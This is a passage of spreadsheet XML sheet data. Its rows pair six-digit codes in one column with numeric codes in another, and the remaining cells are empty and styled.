      <c r="E2370" s="3"/>
      <c r="F2370" s="1"/>
      <c r="H2370" s="1"/>
    </row>
    <row r="2371" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2371" s="5">
        <v>700143</v>
      </c>
      <c r="B2371" s="3">
        <v>901136.00100000005</v>
      </c>
      <c r="D2371" s="5"/>
      <c r="E2371" s="3"/>
      <c r="F2371" s="1"/>
      <c r="H2371" s="1"/>
    </row>
    <row r="2372" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2372" s="5">
        <v>700143</v>
      </c>
      <c r="B2372" s="3">
        <v>901011.00100000005</v>
      </c>
      <c r="D2372" s="5"/>
      <c r="E2372" s="3"/>
      <c r="F2372" s="1"/>
      <c r="H2372" s="1"/>
    </row>
    <row r="2373" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2373" s="5">
        <v>700143</v>
      </c>
      <c r="B2373" s="3">
        <v>901210</v>
      </c>
      <c r="D2373" s="5"/>
      <c r="E2373" s="3"/>
      <c r="F2373" s="1"/>
      <c r="H2373" s="1"/>
    </row>
    <row r="2374" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2374" s="5">
        <v>700143</v>
      </c>
      <c r="B2374" s="3">
        <v>901091</v>
      </c>
      <c r="D2374" s="5"/>
      <c r="E2374" s="3"/>
      <c r="F2374" s="1"/>
      <c r="H2374" s="1"/>
    </row>
    <row r="2375" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2375" s="5">
        <v>700143</v>
      </c>
      <c r="B2375" s="3">
        <v>901113</v>
      </c>
      <c r="D2375" s="5"/>
      <c r="E2375" s="3"/>
      <c r="F2375" s="1"/>
      <c r="H2375" s="1"/>
    </row>
    <row r="2376" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2376" s="5">
        <v>700143</v>
      </c>
      <c r="B2376" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D2376" s="5"/>
      <c r="E2376" s="3"/>
      <c r="F2376" s="1"/>
      <c r="H2376" s="1"/>
    </row>
    <row r="2377" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2377" s="5">
        <v>700143</v>
      </c>
      <c r="B2377" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2377" s="5"/>
      <c r="E2377" s="3"/>
      <c r="F2377" s="1"/>
      <c r="H2377" s="1"/>
    </row>
    <row r="2378" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2378" s="5">
        <v>700036</v>
      </c>
      <c r="B2378" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="D2378" s="5"/>
      <c r="E2378" s="3"/>
      <c r="F2378" s="1"/>
      <c r="H2378" s="1"/>
    </row>
    <row r="2379" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2379" s="5">
        <v>700036</v>
      </c>
      <c r="B2379" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2379" s="5"/>
      <c r="E2379" s="3"/>
      <c r="F2379" s="1"/>
      <c r="H2379" s="1"/>
    </row>
    <row r="2380" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2380" s="5">
        <v>700036</v>
      </c>
      <c r="B2380" s="3">
        <v>901005</v>
      </c>
      <c r="D2380" s="5"/>
      <c r="E2380" s="3"/>
      <c r="F2380" s="1"/>
      <c r="H2380" s="1"/>
    </row>
    <row r="2381" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2381" s="5">
        <v>700036</v>
      </c>
      <c r="B2381" s="3">
        <v>901025</v>
      </c>
      <c r="D2381" s="5"/>
      <c r="E2381" s="3"/>
      <c r="F2381" s="1"/>
      <c r="H2381" s="1"/>
    </row>
    <row r="2382" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2382" s="5">
        <v>700036</v>
      </c>
      <c r="B2382" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D2382" s="5"/>
      <c r="E2382" s="3"/>
      <c r="F2382" s="1"/>
      <c r="H2382" s="1"/>
    </row>
    <row r="2383" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2383" s="5">
        <v>700036</v>
      </c>
      <c r="B2383" s="3">
        <v>901083</v>
      </c>
      <c r="D2383" s="5"/>
      <c r="E2383" s="3"/>
      <c r="F2383" s="1"/>
      <c r="H2383" s="1"/>
    </row>
    <row r="2384" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2384" s="5">
        <v>700381</v>
      </c>
      <c r="B2384" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2384" s="5"/>
      <c r="E2384" s="3"/>
      <c r="F2384" s="1"/>
      <c r="H2384" s="1"/>
    </row>
    <row r="2385" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2385" s="5">
        <v>700381</v>
      </c>
      <c r="B2385" s="3">
        <v>901001</v>
      </c>
      <c r="D2385" s="5"/>
      <c r="E2385" s="3"/>
      <c r="F2385" s="1"/>
      <c r="H2385" s="1"/>
    </row>
    <row r="2386" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2386" s="5">
        <v>700381</v>
      </c>
      <c r="B2386" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2386" s="5"/>
      <c r="E2386" s="3"/>
      <c r="F2386" s="1"/>
      <c r="H2386" s="1"/>
    </row>
    <row r="2387" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2387" s="5">
        <v>700381</v>
      </c>
      <c r="B2387" s="3">
        <v>901120</v>
      </c>
      <c r="D2387" s="5"/>
      <c r="E2387" s="3"/>
      <c r="F2387" s="1"/>
      <c r="H2387" s="1"/>
    </row>
    <row r="2388" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2388" s="5">
        <v>700381</v>
      </c>
      <c r="B2388" s="3">
        <v>901069.00100000005</v>
      </c>
      <c r="D2388" s="5"/>
      <c r="E2388" s="3"/>
      <c r="F2388" s="1"/>
      <c r="H2388" s="1"/>
    </row>
    <row r="2389" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2389" s="5">
        <v>700381</v>
      </c>
      <c r="B2389" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2389" s="5"/>
      <c r="E2389" s="3"/>
      <c r="F2389" s="1"/>
      <c r="H2389" s="1"/>
    </row>
    <row r="2390" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2390" s="5">
        <v>700381</v>
      </c>
      <c r="B2390" s="3">
        <v>901082</v>
      </c>
      <c r="D2390" s="5"/>
      <c r="E2390" s="3"/>
      <c r="F2390" s="1"/>
      <c r="H2390" s="1"/>
    </row>
    <row r="2391" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2391" s="5">
        <v>700381</v>
      </c>
      <c r="B2391" s="3">
        <v>901033</v>
      </c>
      <c r="D2391" s="5"/>
      <c r="E2391" s="3"/>
      <c r="F2391" s="1"/>
      <c r="H2391" s="1"/>
    </row>
    <row r="2392" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2392" s="5">
        <v>700381</v>
      </c>
      <c r="B2392" s="3">
        <v>901047</v>
      </c>
      <c r="D2392" s="5"/>
      <c r="E2392" s="3"/>
      <c r="F2392" s="1"/>
      <c r="H2392" s="1"/>
    </row>
    <row r="2393" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2393" s="5">
        <v>700383</v>
      </c>
      <c r="B2393" s="3">
        <v>901027</v>
      </c>
      <c r="D2393" s="5"/>
      <c r="E2393" s="3"/>
      <c r="F2393" s="1"/>
      <c r="H2393" s="1"/>
    </row>
    <row r="2394" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2394" s="5">
        <v>700408</v>
      </c>
      <c r="B2394" s="3">
        <v>901435</v>
      </c>
      <c r="D2394" s="5"/>
      <c r="E2394" s="3"/>
      <c r="F2394" s="1"/>
      <c r="H2394" s="1"/>
    </row>
    <row r="2395" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2395" s="5">
        <v>700408</v>
      </c>
      <c r="B2395" s="3">
        <v>901432</v>
      </c>
      <c r="D2395" s="5"/>
      <c r="E2395" s="3"/>
      <c r="F2395" s="1"/>
      <c r="H2395" s="1"/>
    </row>
    <row r="2396" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2396" s="5">
        <v>700408</v>
      </c>
      <c r="B2396" s="3">
        <v>901409</v>
      </c>
      <c r="D2396" s="5"/>
      <c r="E2396" s="3"/>
      <c r="F2396" s="1"/>
      <c r="H2396" s="1"/>
    </row>
    <row r="2397" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2397" s="5">
        <v>700408</v>
      </c>
      <c r="B2397" s="3">
        <v>901418</v>
      </c>
      <c r="D2397" s="5"/>
      <c r="E2397" s="3"/>
      <c r="F2397" s="1"/>
      <c r="H2397" s="1"/>
    </row>
    <row r="2398" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2398" s="5">
        <v>700408</v>
      </c>
      <c r="B2398" s="3">
        <v>901402</v>
      </c>
      <c r="D2398" s="5"/>
      <c r="E2398" s="3"/>
      <c r="F2398" s="1"/>
      <c r="H2398" s="1"/>
    </row>
    <row r="2399" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2399" s="5">
        <v>700408</v>
      </c>
      <c r="B2399" s="3">
        <v>901429</v>
      </c>
      <c r="D2399" s="5"/>
      <c r="E2399" s="3"/>
      <c r="F2399" s="1"/>
      <c r="H2399" s="1"/>
    </row>
    <row r="2400" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2400" s="5">
        <v>700408</v>
      </c>
      <c r="B2400" s="3">
        <v>901512</v>
      </c>
      <c r="D2400" s="5"/>
      <c r="E2400" s="3"/>
      <c r="F2400" s="1"/>
      <c r="H2400" s="1"/>
    </row>
    <row r="2401" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2401" s="5">
        <v>700408</v>
      </c>
      <c r="B2401" s="3">
        <v>901412</v>
      </c>
      <c r="D2401" s="5"/>
      <c r="E2401" s="3"/>
      <c r="F2401" s="1"/>
      <c r="H2401" s="1"/>
    </row>
    <row r="2402" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2402" s="5">
        <v>700408</v>
      </c>
      <c r="B2402" s="3">
        <v>901533</v>
      </c>
      <c r="D2402" s="5"/>
      <c r="E2402" s="3"/>
      <c r="F2402" s="1"/>
      <c r="H2402" s="1"/>
    </row>
    <row r="2403" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2403" s="5">
        <v>700408</v>
      </c>
      <c r="B2403" s="3">
        <v>901447</v>
      </c>
      <c r="D2403" s="5"/>
      <c r="E2403" s="3"/>
      <c r="F2403" s="1"/>
      <c r="H2403" s="1"/>
    </row>
    <row r="2404" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2404" s="5">
        <v>700408</v>
      </c>
      <c r="B2404" s="3">
        <v>901417</v>
      </c>
      <c r="D2404" s="5"/>
      <c r="E2404" s="3"/>
      <c r="F2404" s="1"/>
      <c r="H2404" s="1"/>
    </row>
    <row r="2405" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2405" s="5">
        <v>700408</v>
      </c>
      <c r="B2405" s="3">
        <v>901430</v>
      </c>
      <c r="D2405" s="5"/>
      <c r="E2405" s="3"/>
      <c r="F2405" s="1"/>
      <c r="H2405" s="1"/>
    </row>
    <row r="2406" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2406" s="5">
        <v>700408</v>
      </c>
      <c r="B2406" s="3">
        <v>901400</v>
      </c>
      <c r="D2406" s="5"/>
      <c r="E2406" s="3"/>
      <c r="F2406" s="1"/>
      <c r="H2406" s="1"/>
    </row>
    <row r="2407" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2407" s="5">
        <v>700408</v>
      </c>
      <c r="B2407" s="3">
        <v>901507</v>
      </c>
      <c r="D2407" s="5"/>
      <c r="E2407" s="3"/>
      <c r="F2407" s="1"/>
      <c r="H2407" s="1"/>
    </row>
    <row r="2408" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2408" s="5">
        <v>700408</v>
      </c>
      <c r="B2408" s="3">
        <v>901406</v>
      </c>
      <c r="D2408" s="5"/>
      <c r="E2408" s="3"/>
      <c r="F2408" s="1"/>
      <c r="H2408" s="1"/>
    </row>
    <row r="2409" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2409" s="5">
        <v>700408</v>
      </c>
      <c r="B2409" s="3">
        <v>901513</v>
      </c>
      <c r="D2409" s="5"/>
      <c r="E2409" s="3"/>
      <c r="F2409" s="1"/>
      <c r="H2409" s="1"/>
    </row>
    <row r="2410" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2410" s="5">
        <v>700408</v>
      </c>
      <c r="B2410" s="3">
        <v>901508</v>
      </c>
      <c r="D2410" s="5"/>
      <c r="E2410" s="3"/>
      <c r="F2410" s="1"/>
      <c r="H2410" s="1"/>
    </row>
    <row r="2411" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2411" s="5">
        <v>700408</v>
      </c>
      <c r="B2411" s="3">
        <v>901509</v>
      </c>
      <c r="D2411" s="5"/>
      <c r="E2411" s="3"/>
      <c r="F2411" s="1"/>
      <c r="H2411" s="1"/>
    </row>
    <row r="2412" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2412" s="5">
        <v>700173</v>
      </c>
      <c r="B2412" s="3">
        <v>901572</v>
      </c>
      <c r="D2412" s="5"/>
      <c r="E2412" s="3"/>
      <c r="F2412" s="1"/>
      <c r="H2412" s="1"/>
    </row>
    <row r="2413" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2413" s="5">
        <v>700193</v>
      </c>
      <c r="B2413" s="3">
        <v>901005</v>
      </c>
      <c r="D2413" s="5"/>
      <c r="E2413" s="3"/>
      <c r="F2413" s="1"/>
      <c r="H2413" s="1"/>
    </row>
    <row r="2414" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2414" s="5">
        <v>700193</v>
      </c>
      <c r="B2414" s="3">
        <v>901083</v>
      </c>
      <c r="D2414" s="5"/>
      <c r="E2414" s="3"/>
      <c r="F2414" s="1"/>
      <c r="H2414" s="1"/>
    </row>
    <row r="2415" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2415" s="5">
        <v>700193</v>
      </c>
      <c r="B2415" s="3">
        <v>901202</v>
      </c>
      <c r="D2415" s="5"/>
      <c r="E2415" s="3"/>
      <c r="F2415" s="1"/>
      <c r="H2415" s="1"/>
    </row>
    <row r="2416" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2416" s="5">
        <v>700503</v>
      </c>
      <c r="B2416" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="D2416" s="5"/>
      <c r="E2416" s="3"/>
      <c r="F2416" s="1"/>
      <c r="H2416" s="1"/>
    </row>
    <row r="2417" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2417" s="5">
        <v>700503</v>
      </c>
      <c r="B2417" s="3">
        <v>901005</v>
      </c>
      <c r="D2417" s="5"/>
      <c r="E2417" s="3"/>
      <c r="F2417" s="1"/>
      <c r="H2417" s="1"/>
    </row>
    <row r="2418" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2418" s="5">
        <v>700503</v>
      </c>
      <c r="B2418" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D2418" s="5"/>
      <c r="E2418" s="3"/>
      <c r="F2418" s="1"/>
      <c r="H2418" s="1"/>
    </row>
    <row r="2419" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2419" s="5">
        <v>700503</v>
      </c>
      <c r="B2419" s="3">
        <v>901048</v>
      </c>
      <c r="D2419" s="5"/>
      <c r="E2419" s="3"/>
      <c r="F2419" s="1"/>
      <c r="H2419" s="1"/>
    </row>
    <row r="2420" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2420" s="5">
        <v>700503</v>
      </c>
      <c r="B2420" s="3">
        <v>901057</v>
      </c>
      <c r="D2420" s="5"/>
      <c r="E2420" s="3"/>
      <c r="F2420" s="1"/>
      <c r="H2420" s="1"/>
    </row>
    <row r="2421" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2421" s="5">
        <v>700577</v>
      </c>
      <c r="B2421" s="3">
        <v>901409</v>
      </c>
      <c r="D2421" s="5"/>
      <c r="E2421" s="3"/>
      <c r="F2421" s="1"/>
      <c r="H2421" s="1"/>
    </row>
    <row r="2422" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2422" s="5">
        <v>700577</v>
      </c>
      <c r="B2422" s="3">
        <v>901429</v>
      </c>
      <c r="D2422" s="5"/>
      <c r="E2422" s="3"/>
      <c r="F2422" s="1"/>
      <c r="H2422" s="1"/>
    </row>
    <row r="2423" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2423" s="5">
        <v>700577</v>
      </c>
      <c r="B2423" s="3">
        <v>901412</v>
      </c>
      <c r="D2423" s="5"/>
      <c r="E2423" s="3"/>
      <c r="F2423" s="1"/>
      <c r="H2423" s="1"/>
    </row>
    <row r="2424" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2424" s="5">
        <v>700577</v>
      </c>
      <c r="B2424" s="3">
        <v>901532</v>
      </c>
      <c r="D2424" s="5"/>
      <c r="E2424" s="3"/>
      <c r="F2424" s="1"/>
      <c r="H2424" s="1"/>
    </row>
    <row r="2425" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2425" s="5">
        <v>700577</v>
      </c>
      <c r="B2425" s="3">
        <v>901533</v>
      </c>
      <c r="D2425" s="5"/>
      <c r="E2425" s="3"/>
      <c r="F2425" s="1"/>
      <c r="H2425" s="1"/>
    </row>
    <row r="2426" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2426" s="5">
        <v>700577</v>
      </c>
      <c r="B2426" s="3">
        <v>901407</v>
      </c>
      <c r="D2426" s="5"/>
      <c r="E2426" s="3"/>
      <c r="F2426" s="1"/>
      <c r="H2426" s="1"/>
    </row>
    <row r="2427" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2427" s="5">
        <v>700577</v>
      </c>
      <c r="B2427" s="3">
        <v>901420</v>
      </c>
      <c r="D2427" s="5"/>
      <c r="E2427" s="3"/>
      <c r="F2427" s="1"/>
      <c r="H2427" s="1"/>
    </row>
    <row r="2428" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2428" s="5">
        <v>700577</v>
      </c>
      <c r="B2428" s="3">
        <v>901430</v>
      </c>
      <c r="D2428" s="5"/>
      <c r="E2428" s="3"/>
      <c r="F2428" s="1"/>
      <c r="H2428" s="1"/>
    </row>
    <row r="2429" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2429" s="5">
        <v>700577</v>
      </c>
      <c r="B2429" s="3">
        <v>901444</v>
      </c>
      <c r="D2429" s="5"/>
      <c r="E2429" s="3"/>
      <c r="F2429" s="1"/>
      <c r="H2429" s="1"/>
    </row>
    <row r="2430" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2430" s="5">
        <v>700577</v>
      </c>
      <c r="B2430" s="3">
        <v>901426</v>
      </c>
      <c r="D2430" s="5"/>
      <c r="E2430" s="3"/>
      <c r="F2430" s="1"/>
      <c r="H2430" s="1"/>
    </row>
    <row r="2431" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2431" s="5">
        <v>700577</v>
      </c>
      <c r="B2431" s="3">
        <v>901422</v>
      </c>
      <c r="D2431" s="5"/>
      <c r="E2431" s="3"/>
      <c r="F2431" s="1"/>
      <c r="H2431" s="1"/>
    </row>
    <row r="2432" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2432" s="5">
        <v>700277</v>
      </c>
      <c r="B2432" s="3">
        <v>901543.00100000005</v>
      </c>
      <c r="D2432" s="5"/>
      <c r="E2432" s="3"/>
      <c r="F2432" s="1"/>
      <c r="H2432" s="1"/>
    </row>
    <row r="2433" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2433" s="5">
        <v>700277</v>
      </c>
      <c r="B2433" s="3">
        <v>901083</v>
      </c>
      <c r="D2433" s="5"/>
      <c r="E2433" s="3"/>
      <c r="F2433" s="1"/>
      <c r="H2433" s="1"/>
    </row>
    <row r="2434" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2434" s="5">
        <v>700277</v>
      </c>
      <c r="B2434" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D2434" s="5"/>
      <c r="E2434" s="3"/>
      <c r="F2434" s="1"/>
      <c r="H2434" s="1"/>
    </row>
    <row r="2435" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2435" s="5">
        <v>700277</v>
      </c>
      <c r="B2435" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2435" s="5"/>
      <c r="E2435" s="3"/>
      <c r="F2435" s="1"/>
      <c r="H2435" s="1"/>
    </row>
    <row r="2436" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2436" s="5">
        <v>700277</v>
      </c>
      <c r="B2436" s="3">
        <v>901027</v>
      </c>
      <c r="D2436" s="5"/>
      <c r="E2436" s="3"/>
      <c r="F2436" s="1"/>
      <c r="H2436" s="1"/>
    </row>
    <row r="2437" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2437" s="5">
        <v>700277</v>
      </c>
      <c r="B2437" s="3">
        <v>901057</v>
      </c>
      <c r="D2437" s="5"/>
      <c r="E2437" s="3"/>
      <c r="F2437" s="1"/>
      <c r="H2437" s="1"/>
    </row>
    <row r="2438" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2438" s="5">
        <v>700277</v>
      </c>
      <c r="B2438" s="3">
        <v>901113</v>
      </c>
      <c r="D2438" s="5"/>
      <c r="E2438" s="3"/>
      <c r="F2438" s="1"/>
      <c r="H2438" s="1"/>
    </row>
    <row r="2439" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2439" s="5">
        <v>700095</v>
      </c>
      <c r="B2439" s="3">
        <v>901048.00300000003</v>
      </c>
      <c r="D2439" s="5"/>
      <c r="E2439" s="3"/>
      <c r="F2439" s="1"/>
      <c r="H2439" s="1"/>
    </row>
    <row r="2440" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2440" s="5">
        <v>700628</v>
      </c>
      <c r="B2440" s="3">
        <v>901140</v>
      </c>
      <c r="D2440" s="5"/>
      <c r="E2440" s="3"/>
      <c r="F2440" s="1"/>
      <c r="H2440" s="1"/>
    </row>
    <row r="2441" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2441" s="5">
        <v>700628</v>
      </c>
      <c r="B2441" s="3">
        <v>901083</v>
      </c>
      <c r="D2441" s="5"/>
      <c r="E2441" s="3"/>
      <c r="F2441" s="1"/>
      <c r="H2441" s="1"/>
    </row>
    <row r="2442" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2442" s="5">
        <v>700628</v>
      </c>
      <c r="B2442" s="3">
        <v>901105</v>
      </c>
      <c r="D2442" s="5"/>
      <c r="E2442" s="3"/>
      <c r="F2442" s="1"/>
      <c r="H2442" s="1"/>
    </row>
    <row r="2443" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2443" s="5">
        <v>700628</v>
      </c>
      <c r="B2443" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D2443" s="5"/>
      <c r="E2443" s="3"/>
      <c r="F2443" s="1"/>
      <c r="H2443" s="1"/>
    </row>
    <row r="2444" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2444" s="5">
        <v>700410</v>
      </c>
      <c r="B2444" s="3">
        <v>901547.01300000004</v>
      </c>
      <c r="D2444" s="5"/>
      <c r="E2444" s="3"/>
      <c r="F2444" s="1"/>
      <c r="H2444" s="1"/>
    </row>
    <row r="2445" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2445" s="5">
        <v>700410</v>
      </c>
      <c r="B2445" s="3">
        <v>901059.00399999996</v>
      </c>
      <c r="D2445" s="5"/>
      <c r="E2445" s="3"/>
      <c r="F2445" s="1"/>
      <c r="H2445" s="1"/>
    </row>
    <row r="2446" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2446" s="5">
        <v>700410</v>
      </c>
      <c r="B2446" s="3">
        <v>901543.00199999998</v>
      </c>
      <c r="D2446" s="5"/>
      <c r="E2446" s="3"/>
      <c r="F2446" s="1"/>
      <c r="H2446" s="1"/>
    </row>
    <row r="2447" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2447" s="5">
        <v>700410</v>
      </c>
      <c r="B2447" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D2447" s="5"/>
      <c r="E2447" s="3"/>
      <c r="F2447" s="1"/>
      <c r="H2447" s="1"/>
    </row>
    <row r="2448" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2448" s="5">
        <v>700410</v>
      </c>
      <c r="B2448" s="3">
        <v>901083</v>
      </c>
      <c r="D2448" s="5"/>
      <c r="E2448" s="3"/>
      <c r="F2448" s="1"/>
      <c r="H2448" s="1"/>
    </row>
    <row r="2449" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2449" s="5">
        <v>700410</v>
      </c>
      <c r="B2449" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2449" s="5"/>
      <c r="E2449" s="3"/>
      <c r="F2449" s="1"/>
      <c r="H2449" s="1"/>
    </row>
    <row r="2450" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2450" s="5">
        <v>700410</v>
      </c>
      <c r="B2450" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D2450" s="5"/>
      <c r="E2450" s="3"/>
      <c r="F2450" s="1"/>
      <c r="H2450" s="1"/>
    </row>
    <row r="2451" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2451" s="5">
        <v>700410</v>
      </c>
      <c r="B2451" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D2451" s="5"/>
      <c r="E2451" s="3"/>
      <c r="F2451" s="1"/>
      <c r="H2451" s="1"/>
    </row>
    <row r="2452" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2452" s="5">
        <v>700410</v>
      </c>
      <c r="B2452" s="3">
        <v>901036.005</v>
      </c>
      <c r="D2452" s="5"/>
      <c r="E2452" s="3"/>
      <c r="F2452" s="1"/>
      <c r="H2452" s="1"/>
    </row>
    <row r="2453" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2453" s="5">
        <v>700410</v>
      </c>
      <c r="B2453" s="3">
        <v>901027</v>
      </c>
      <c r="D2453" s="5"/>
      <c r="E2453" s="3"/>
      <c r="F2453" s="1"/>
      <c r="H2453" s="1"/>
    </row>
    <row r="2454" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2454" s="5">
        <v>700410</v>
      </c>
      <c r="B2454" s="3">
        <v>901057</v>
      </c>
      <c r="D2454" s="5"/>
      <c r="E2454" s="3"/>
      <c r="F2454" s="1"/>
      <c r="H2454" s="1"/>
    </row>
    <row r="2455" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2455" s="5">
        <v>700410</v>
      </c>
      <c r="B2455" s="3">
        <v>901082</v>
      </c>
      <c r="D2455" s="5"/>
      <c r="E2455" s="3"/>
      <c r="F2455" s="1"/>
      <c r="H2455" s="1"/>
    </row>
    <row r="2456" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2456" s="5">
        <v>700168</v>
      </c>
      <c r="B2456" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2456" s="5"/>
      <c r="E2456" s="3"/>
      <c r="F2456" s="1"/>
      <c r="H2456" s="1"/>
    </row>
    <row r="2457" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2457" s="5">
        <v>700168</v>
      </c>
      <c r="B2457" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2457" s="5"/>
      <c r="E2457" s="3"/>
      <c r="F2457" s="1"/>
      <c r="H2457" s="1"/>
    </row>
    <row r="2458" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2458" s="5">
        <v>700168</v>
      </c>
      <c r="B2458" s="3">
        <v>901547.00399999996</v>
      </c>
      <c r="D2458" s="5"/>
      <c r="E2458" s="3"/>
      <c r="F2458" s="1"/>
      <c r="H2458" s="1"/>
    </row>
    <row r="2459" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2459" s="5">
        <v>700168</v>
      </c>
      <c r="B2459" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D2459" s="5"/>
      <c r="E2459" s="3"/>
      <c r="F2459" s="1"/>
      <c r="H2459" s="1"/>
    </row>
    <row r="2460" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2460" s="5">
        <v>700168</v>
      </c>
      <c r="B2460" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2460" s="5"/>
      <c r="E2460" s="3"/>
      <c r="F2460" s="1"/>
      <c r="H2460" s="1"/>
    </row>
    <row r="2461" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2461" s="5">
        <v>700168</v>
      </c>
      <c r="B2461" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D2461" s="5"/>
      <c r="E2461" s="3"/>
      <c r="F2461" s="1"/>
      <c r="H2461" s="1"/>
    </row>
    <row r="2462" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2462" s="5">
        <v>700168</v>
      </c>
      <c r="B2462" s="3">
        <v>901546.00199999998</v>
      </c>
      <c r="D2462" s="5"/>
      <c r="E2462" s="3"/>
      <c r="F2462" s="1"/>
      <c r="H2462" s="1"/>
    </row>
    <row r="2463" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2463" s="5">
        <v>700168</v>
      </c>
      <c r="B2463" s="3">
        <v>901564.00399999996</v>
      </c>
      <c r="D2463" s="5"/>
      <c r="E2463" s="3"/>
      <c r="F2463" s="1"/>
      <c r="H2463" s="1"/>
    </row>
    <row r="2464" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2464" s="5">
        <v>700168</v>
      </c>
      <c r="B2464" s="3">
